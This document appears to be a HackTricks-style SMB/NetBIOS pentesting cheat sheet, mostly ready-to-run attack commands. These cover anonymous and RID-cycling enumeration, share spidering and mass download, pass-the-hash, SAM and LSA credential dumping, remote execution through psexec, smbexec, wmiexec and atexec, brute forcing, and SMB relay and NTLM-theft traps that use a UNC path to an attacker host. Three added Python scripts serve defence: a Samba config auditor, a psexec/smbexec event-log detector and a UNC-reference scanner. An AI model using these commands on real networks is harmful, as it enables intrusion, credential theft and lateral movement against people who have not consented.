139,445 - SMB
NetBIOS Overview
NetBIOS (Network Basic Input/Output System) is a legacy API that allows applications on different computers to communicate over a local area network (LAN). It provides services related to the session layer of the OSI model, enabling applications to connect to each other over the network.
Port 139 is used by the NetBIOS Session Service, which provides session-layer functionality, such as:
File and Printer Sharing: Port 139 is often used by Windows systems to support file and printer sharing, especially over older versions of Windows networking.
Authentication and Login: It can facilitate the authentication and login processes in certain network configurations.
Establishing Sessions: Port 139 is used to establish sessions between two computers for communication, particularly for sharing resources.
Server Message Block Overview - Port 445
Port 445 is identified as ‘SMB over IP’. The acronym SMB stands for ‘Server Message Blocks’; the protocol is also known today as the Common Internet File System (CIFS). As an application-layer network protocol, SMB/CIFS is primarily used to provide shared access to files, printers and serial ports, and to carry various other forms of communication between nodes on a network.
The Server Message Block (SMB) protocol, operating in a client-server model, is designed for regulating access to files, directories, and other network resources like printers and routers. Primarily utilized within the Windows operating system series, SMB ensures backward compatibility, allowing devices with newer versions of Microsoft's operating system to seamlessly interact with those running older versions. Additionally, the Samba project offers a free software solution, enabling SMB's implementation on Linux and Unix systems, thereby facilitating cross-platform communication through SMB.
IPC$ share
Access to the IPC$ share can be obtained through an anonymous null session, allowing for interaction with services exposed via named pipes.
NTLM and SMB?
SMB often uses NTLM for user authentication when accessing shared resources.
Enumeration
Obtain Information
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
impacket-samrdump -port 139 [[domain/]username[:password]@]<targetName or address>
impacket-samrdump -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
impacket-rpcdump -port 135 [[domain/]username[:password]@]<targetName or address>
impacket-rpcdump -port 139 [[domain/]username[:password]@]<targetName or address>
impacket-rpcdump -port 445 [[domain/]username[:password]@]<targetName or address>
Enumerate Users, Groups & Logged On Users
This information should already have been gathered by enum4linux and enum4linux-ng.
netexec smb 10.10.10.10 --users [-u <username> -p <password>]
netexec smb 10.10.10.10 --groups [-u <username> -p <password>]
netexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -H ldap://10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " " # -H replaces the -h flag removed in newer OpenLDAP releases
rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
Enumerate local users
impacket-lookupsid -no-pass hostname.local
RPCclient - Oneliner
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
RPCclient other commands
rpcclient Commands

Command | Interface | Description |
---|---|---|
queryuser | SAMR | Retrieve user information |
querygroup | SAMR | Retrieve group information |
querydominfo | SAMR | Retrieve domain information |
enumdomusers | SAMR | Enumerate domain users |
enumdomgroups | SAMR | Enumerate domain groups |
createdomuser | SAMR | Create a domain user |
deletedomuser | SAMR | Delete a domain user |
lookupnames | LSARPC | Look up usernames to SID values |
lookupsids | LSARPC | Look up SIDs to usernames (RID cycling) |
lsaaddacctrights | LSARPC | Add rights to a user account |
lsaremoveacctrights | LSARPC | Remove rights from a user account |
dsroledominfo | LSARPC-DS | Get primary domain information |
dsenumdomtrusts | LSARPC-DS | Enumerate trusted domains within an AD forest |
Shared Folders Enumeration
List shared folders
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
netexec smb <IP> -u '' -p '' --shares #Null user
netexec smb <IP> -u 'username' -p 'password' --shares #With creds
netexec smb <IP> -u 'username' -H '<HASH>' --shares #Pass-the-Hash
Connect/List a shared folder
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' [--pw-nt-hash] //<IP>/<Folder> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap; without a folder it lists everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
Manually enumerate windows shares and connect to them
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
Enumerate shares from Windows / without third-party tools
PowerShell
# Retrieves the SMB shares on the local computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
CMD console
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
MMC Snap-in (graphical)
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
explorer.exe (graphical): enter \\<ip>\ to see the available non-hidden shares.
Mount a shared folder
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
Download files
Read previous sections to learn how to connect with credentials/Pass-the-Hash.
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
Commands:
- mask: specifies the mask which is used to filter the files within the directory (e.g. "" for all files)
- recurse: toggles recursion on (default: off)
- prompt: toggles prompting for filenames off (default: on)
- mget: copies all files matching the mask from host to client machine

(Information from the manpage of smbclient)
Domain Shared Folders Search
- Snaffler
Snaffler.exe -s -d domain.local -o snaffler.log -v data
sudo netexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
Read Registry
You may be able to read the registry using some discovered credentials. Impacket reg.py allows you to try:
sudo impacket-reg domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo impacket-reg domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo impacket-reg domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
Post Exploitation
/etc/samba/smb.conf
Setting | Description |
---|---|
browseable = yes | Allow listing available shares in the current share? |
read only = no | Forbid the creation and modification of files? |
writable = yes | Allow users to create and modify files? |
guest ok = yes | Allow connecting to the service without using a password? |
enable privileges = yes | Honor privileges assigned to specific SID? |
create mask = 0777 | What permissions must be assigned to the newly created files? |
directory mask = 0777 | What permissions must be assigned to the newly created directories? |
logon script = script.sh | What script needs to be executed on the user's login? |
magic script = script.sh | Which script should be executed when the script gets closed? |
magic output = script.out | Where the output of the magic script needs to be stored? |
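The table above lists the smb.conf settings that matter from a hardening point of view, but a real config spreads them across [global] and per-share sections and uses synonyms (writable = yes means the same as read only = no). The following is an added audit script, not part of the original page or of Samba: it parses an smb.conf with Samba's own naming rules (case-insensitive keys, internal whitespace ignored, later lines override earlier ones, share values fall back to [global] and then to Samba's built-in defaults) and flags guest-accessible or guest-writable shares, world-writable create/directory masks, map to guest, and logon/magic scripts. The sample config is constructed for the example.

```python
import re
from typing import Dict, List

# Samba compares parameter names case-insensitively and ignores internal
# whitespace: "Read Only", "read only" and "readonly" are the same key.
def _norm(name: str) -> str:
    return re.sub(r"\s+", "", name.strip().lower())

# Synonyms Samba accepts; invert=True means the name is the negated form of
# the canonical parameter (writable = yes is the same as read only = no).
SYNONYMS = {
    "writable": ("readonly", True),
    "writeable": ("readonly", True),
    "writeok": ("readonly", True),
    "public": ("guestok", False),
    "browsable": ("browseable", False),
}

def _yes(value: str) -> bool:
    return value.strip().lower() in ("yes", "true", "1")

def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Return {section: {canonical key: value}}; later lines override earlier ones."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        key, value = _norm(key), value.strip()
        if key in SYNONYMS:
            key, invert = SYNONYMS[key]
            if invert:
                value = "no" if _yes(value) else "yes"
        sections[current][key] = value
    return sections

def effective(sections: Dict[str, Dict[str, str]], share: str, key: str, default: str) -> str:
    """Share-level setting, else the [global] setting, else Samba's built-in default."""
    return sections.get(share, {}).get(key, sections.get("global", {}).get(key, default))

def world_writable(mask: str) -> bool:
    try:
        return bool(int(mask, 8) & 0o002)
    except ValueError:
        return False

def audit_smb_conf(text: str) -> Dict[str, List[str]]:
    """Map each section to the weak settings found in it (absent key = nothing flagged)."""
    sections = parse_smb_conf(text)
    findings: Dict[str, List[str]] = {}
    def flag(section: str, msg: str) -> None:
        findings.setdefault(section, []).append(msg)
    g = sections.get("global", {})
    if _norm(g.get("maptoguest", "never")) != "never":
        flag("global", "map to guest: failed logins are downgraded to guest sessions (%s)" % g["maptoguest"])
    for share, params in sections.items():
        if share == "global":
            continue
        guest = _yes(effective(sections, share, "guestok", "no"))
        writable = not _yes(effective(sections, share, "readonly", "yes"))
        if guest and writable:
            flag(share, "guest-writable: files can be created or modified without a password")
        elif guest:
            flag(share, "guest-readable: contents are exposed without a password")
        if world_writable(effective(sections, share, "createmask", "0744")):   # Samba default 0744
            flag(share, "create mask: new files are world-writable")
        if world_writable(effective(sections, share, "directorymask", "0755")):  # Samba default 0755
            flag(share, "directory mask: new directories are world-writable")
        if "logonscript" in params:
            flag(share, "logon script: clients run %s at logon" % params["logonscript"])
        if "magicscript" in params:
            flag(share, "magic script: the server executes %s when a client closes it" % params["magicscript"])
    return findings

# Constructed sample configuration (not taken from any real system).
SAMPLE_CONF = """\
[global]
   workgroup = WORKGROUP
   map to guest = Bad User
   create mask = 0777

[public]
   path = /srv/public
   guest ok = yes
   read only = no

[finance]
   path = /srv/finance
   Writeable = yes
   guest ok = no
   directory mask = 0777

[homes]
   browseable = no
   read only = yes
"""

if __name__ == "__main__":
    for section, issues in audit_smb_conf(SAMPLE_CONF).items():
        for issue in issues:
            print(f"[{section}] {issue}")
```

Note that [public] is reported as guest-writable and that every share inherits the world-writable create mask from [global], which is exactly the kind of inheritance that is easy to miss when reading the file by eye.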
The command smbstatus gives information about the server and about who is connected.
Authenticate using Kerberos
You can authenticate to kerberos using the tools smbclient and rpcclient:
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
Execute Commands
netexec
apt-get install netexec # netexec is the maintained successor of crackmapexec
#Execute Powershell
netexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'
#Execute cmd
netexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
netexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
#Dump SAM
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam
#Dump LSASS in-memory hashes
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa
#Get sessions
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions
#Get logged-on users
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users
#Enumerate the disks
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks
#Enumerate users
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users
# Enumerate groups
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups
# Enumerate local groups
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups
#Get password policy
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol
#RID brute
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute
#Pass-The-Hash
netexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH>
psexec/smbexec
Both options create a new service on the victim machine (using \pipe\svcctl via SMB) and use it to execute something: psexec uploads an executable file to the ADMIN$ share, while smbexec points the service at cmd.exe/powershell.exe and passes the payload in the service arguments (a file-less technique). More info about psexec and smbexec.
#If no password is provided, it will be prompted
impacket-psexec [[domain/]username[:password]@]<targetName or address>
#Pass-the-Hash
impacket-psexec -hashes <LM:NT> administrator@10.10.10.103
#Sysinternals PsExec (run from a Windows host) uses -u/-p instead of impacket's user:password@host syntax
psexec.exe \\192.168.122.66 -u Administrator -p 123456Ww
#Sysinternals PsExec has no hash option; for Pass-the-Hash use impacket-psexec -hashes as above
Using the parameter -k you can authenticate against Kerberos instead of NTLM.
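The description above gives a defender the two artefacts these tools leave on the target: a new service registered through the Service Control Manager, and either a freshly written binary in ADMIN$ (psexec) or a service image path that is really a command interpreter with the payload in its arguments (smbexec). The following detection logic is an added example, not part of the original page or of impacket: it correlates Windows Security 5145 (network share object accessed) records showing a write to ADMIN$ with System 7045 (service installed) records for a service whose binary has the same file name, and separately flags 7045 records whose image path invokes cmd.exe/%COMSPEC%/powershell or references a UNC path. The events, IPs, service names and timestamps are constructed for the example; the field names are the ones those two event IDs carry.

```python
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed sample events shaped like Security 5145 and System 7045
# records. Hosts, service names, paths and times are invented for the example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"time": "2024-05-01T10:00:00", "id": "5145", "IpAddress": "10.10.10.50",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "XbQqTLvR.exe", "AccessMask": "0x2"},
    {"time": "2024-05-01T10:00:01", "id": "7045", "ServiceName": "XbQqTLvR",
     "ImagePath": r"%SystemRoot%\XbQqTLvR.exe"},
    # interpreter-as-service with the command and its output redirected over SMB
    {"time": "2024-05-01T11:30:00", "id": "7045", "ServiceName": "tmpsvc",
     "ImagePath": r"%COMSPEC% /Q /c whoami > \\127.0.0.1\C$\__output"},
    # benign service install that must not be flagged
    {"time": "2024-05-01T12:00:00", "id": "7045", "ServiceName": "Sense",
     "ImagePath": r"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"},
]

INTERPRETERS = ("cmd.exe", "%comspec%", "powershell")
WRITE_BITS = 0x2 | 0x4  # 5145 AccessMask bits: WriteData (0x2), AppendData (0x4)

def _when(ev: Dict[str, str]) -> datetime:
    return datetime.fromisoformat(ev["time"])

def detect_remote_service_exec(events: List[Dict[str, str]], window_s: int = 60) -> List[Tuple[str, str]]:
    """Return (service name, reason) for 7045 records that look like psexec/smbexec-style execution."""
    findings: List[Tuple[str, str]] = []
    uploads: List[Tuple[datetime, str, str]] = []  # (time, file name, source IP) writes to ADMIN$
    for ev in sorted(events, key=_when):
        if ev["id"] == "5145":
            if ev["ShareName"].upper().endswith("ADMIN$") and int(ev["AccessMask"], 16) & WRITE_BITS:
                uploads.append((_when(ev), ev["RelativeTargetName"].lower(), ev["IpAddress"]))
        elif ev["id"] == "7045":
            name, path = ev["ServiceName"], ev["ImagePath"]
            low = path.lower()
            if any(i in low for i in INTERPRETERS):
                findings.append((name, "service image is a command interpreter (smbexec-style, file-less)"))
            if "\\\\" in path:
                findings.append((name, "service image path references a UNC path"))
            # file name of the service binary, e.g. %SystemRoot%\XbQqTLvR.exe -> xbqqtlvr.exe
            binary = low.split("\\")[-1].split(" ")[0]
            for written_at, fname, ip in uploads:
                age = (_when(ev) - written_at).total_seconds()
                if fname == binary and 0 <= age <= window_s:
                    findings.append((name, f"binary {fname} was written to ADMIN$ from {ip} {int(age)}s earlier (psexec-style)"))
    return findings

if __name__ == "__main__":
    for service, reason in detect_remote_service_exec(SAMPLE_EVENTS):
        print(f"{service}: {reason}")
```

The ADMIN$ correlation depends on object-access auditing for file shares being enabled (5145 is not logged by default), which is worth checking before relying on this rule; the interpreter and UNC checks need only the System log.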
wmiexec/dcomexec
Stealthily execute a command shell without touching the disk or running a new service, using DCOM via port 135. In Kali the scripts are located in /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
impacket-wmiexec [[domain/]username[:password]@]<targetName or address>
#You can append a CMD command to the end of the command line to execute it; if you don't, a semi-interactive shell will be opened
#Pass-the-Hash
impacket-wmiexec -hashes LM:NT administrator@10.10.10.103
Using the parameter -k you can authenticate against Kerberos instead of NTLM.
#If no password is provided, it will be prompted
#You can append a CMD command to the end of the command line to execute it; if you don't, a semi-interactive shell will be opened
impacket-dcomexec [[domain/]username[:password]@]<targetName or address>
#Pass-the-Hash
impacket-dcomexec -hashes <LM:NT> administrator@10.10.10.103
AtExec
Execute commands via the Task Scheduler (using \pipe\atsvc via SMB). In Kali the script is located in /usr/share/doc/python3-impacket/examples/
impacket-atexec [[domain/]username[:password]@]<targetName or address> "command"
impacket-atexec -hashes <LM:NT> administrator@10.10.10.175 "whoami"
Bruteforce users credentials
This is not recommended: you could lock an account if you exceed the maximum allowed attempts.
nmap --script smb-brute -p 445 <IP>
#Get usernames bruteforcing that rids and then try to bruteforce each user name
ridenum.py <IP> 500 50000 /root/passwds.txt # ridenum is a TrustedSec script, not part of impacket
SMB relay attack
This attack uses the Responder toolkit to capture SMB authentication sessions on an internal network, and relays them to a target machine. If the authentication session is successful, it will automatically drop you into a system shell. More information about this attack here.
SMB-Trap
The Windows library URLMon.dll automatically tries to authenticate to the host when a page tries to access some content via SMB, for example: img src="\\10.10.10.10\path\image.jpg"
This happens with the functions:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream

These are used by some browsers and tools (like Skype).
From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html
SMBTrap using MitMf
NTLM Theft
Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can elicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an SMB relay attack.
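Both the SMB-Trap example above (an img tag pointing at \\10.10.10.10\...) and the planted-file variant rely on a file that references a UNC path on a host the victim does not normally talk to, so a defender can look for exactly that in web content and on shares. The following scanner is an added example, not part of the original page or of any of the tools it names: it walks a directory tree, extracts every \\host\... reference from each file (reading both 8-bit text and UTF-16LE, the encoding Windows uses for many shortcut and INI-style files) and reports any host outside an allowlist. The sample files, the address 10.10.10.10 and the allowlisted server name fileserver01.corp.local are constructed for the example.

```python
import os
import re
import tempfile
from typing import List, Set, Tuple

# Matches a UNC reference (\\host\...) and captures the host part.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9_.-]+)\\")

# Assumption for the example: servers that files in this environment may
# legitimately point at. Any other host is reported.
TRUSTED_HOSTS: Set[str] = {"fileserver01.corp.local"}

def unc_hosts(data: bytes) -> Set[str]:
    """Hosts referenced by UNC paths in a file's content, checked as 8-bit text and as UTF-16LE."""
    hosts: Set[str] = set()
    for text in (data.decode("latin-1"), data.decode("utf-16-le", errors="ignore")):
        hosts.update(m.group(1).lower() for m in UNC_RE.finditer(text))
    return hosts

def scan_tree(root: str, trusted: Set[str] = TRUSTED_HOSTS) -> List[Tuple[str, str]]:
    """(path relative to root, host) for every file that points at a host outside the allowlist."""
    findings: List[Tuple[str, str]] = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read(4 * 1024 * 1024)  # bounded read per file
            for host in unc_hosts(data) - trusted:
                findings.append((os.path.relpath(path, root), host))
    return sorted(findings)

def build_sample_share() -> str:
    """Write constructed sample files into a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="share-audit-")
    samples = {
        # the page's own example: an image tag that loads from a UNC path
        "page.html": r'<html><body><img src="\\10.10.10.10\path\image.jpg"></body></html>',
        # a shortcut whose icon is fetched from a remote share
        "shortcut.url": "[InternetShortcut]\r\nURL=https://intranet.example/\r\n"
                        "IconFile=\\\\10.10.10.10\\share\\icon.ico\r\nIconIndex=0\r\n",
        # a legitimate reference to the allowlisted server: must not be reported
        "notes.txt": r"Quarterly figures are on \\fileserver01.corp.local\finance\2024",
    }
    for name, text in samples.items():
        with open(os.path.join(root, name), "w", newline="") as fh:
            fh.write(text)
    # the same shortcut saved as UTF-16LE, as Windows often writes such files
    with open(os.path.join(root, "unicode.url"), "wb") as fh:
        fh.write(samples["shortcut.url"].encode("utf-16-le"))
    return root

if __name__ == "__main__":
    for rel_path, host in scan_tree(build_sample_share()):
        print(f"{rel_path}: references untrusted host {host}")
```

A hit on a writable share is a reasonable trigger to check which account created the file and when, and the same host extraction can be applied to proxy logs or mail attachments.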
HackTricks Automatic Commands
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
netexec smb {IP}
netexec smb {IP} --pass-pol -u "" -p ""
netexec smb {IP} --pass-pol -u "guest" -p ""
impacket-GetADUsers -dc-ip {IP} "{Domain_Name}/" -all
impacket-GetNPUsers -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
impacket-GetUserSPNs -dc-ip {IP} -request "{Domain_Name}/"
impacket-getArch -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient -L "//{IP}" -U "{Username}" -W "{Domain_Name}"
smbclient -L "//{IP}" -U "{Username}%{NT_Hash}" -W "{Domain_Name}" --pw-nt-hash
netexec smb {IP} -u {Username} -p {Password} --shares
impacket-GetADUsers {Domain_Name}/{Username}:{Password} -all
impacket-GetNPUsers {Domain_Name}/{Username}:{Password} -request -format hashcat
impacket-GetUserSPNs {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.xyz/pentesting/pentesting-smb
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'